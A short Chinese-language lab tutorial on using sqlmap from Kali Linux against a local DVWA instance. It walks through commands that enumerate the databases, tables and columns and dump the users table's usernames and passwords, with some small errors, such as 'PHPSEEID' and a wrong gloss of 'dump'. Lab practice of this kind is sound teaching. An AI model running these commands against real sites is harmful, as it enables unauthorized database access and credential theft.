今天来学习salmap的使用
首先我们要使用的工具是VMware、centos7、kali-Linux
基于工具VMware安装centos7、kali-linux。
在centos7中搭建LAMP。接着基于LAMP搭建DVWA的环境
使用的环境是基于DVWA开展的
首先打开centos7,打开dvwa
这里登录DVWA需要使用用户登录,可以看到我是使用admin登录的
admin用户的默认密码是password。登录完成后我们把Security Level的等级调成low。
等级在这里调。
接着打开kali-Linux打开终端
在DVWA中进入SQL Injection界面单击submit然后复制url
http://192.168.235.132/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#
在kali中输入sqlmap -u “http://192.168.235.132/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#”
打开dvwa进入开发者模式查看cookie
接着输入
--cookie =“security=low;PHPSEEID=r1bbt3mfe5da6v4h9a1k910r2a” -dbs
复制自己的PHPSEEID和security
默认一直y(也就是enter)
可以看到我的dvwa中有两个库
这边以dvwa为例
输入 sqlmap -u “http://192.168.235.132/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#” --cookie “security=low;PHPSEEID=r1bbt3mfe5da6v4h9a1k910r2a” -D dvwa --tables 可以查看表
输入 sqlmap -u “http://192.168.235.132/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#” --cookie “security=low;PHPSEEID=r1bbt3mfe5da6v4h9a1k910r2a” -T users --column 可以查看表内的数据
输入: sqlmap -u “http://192.168.235.132/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#” --cookie “security=low;PHPSEEID=r1bbt3mfe5da6v4h9a1k910r2a” -C user,password --dump 查看用户名和密码
总结:
dbs:数据库
D:databases
T:tables
C: column(列)
dump:备份文件系统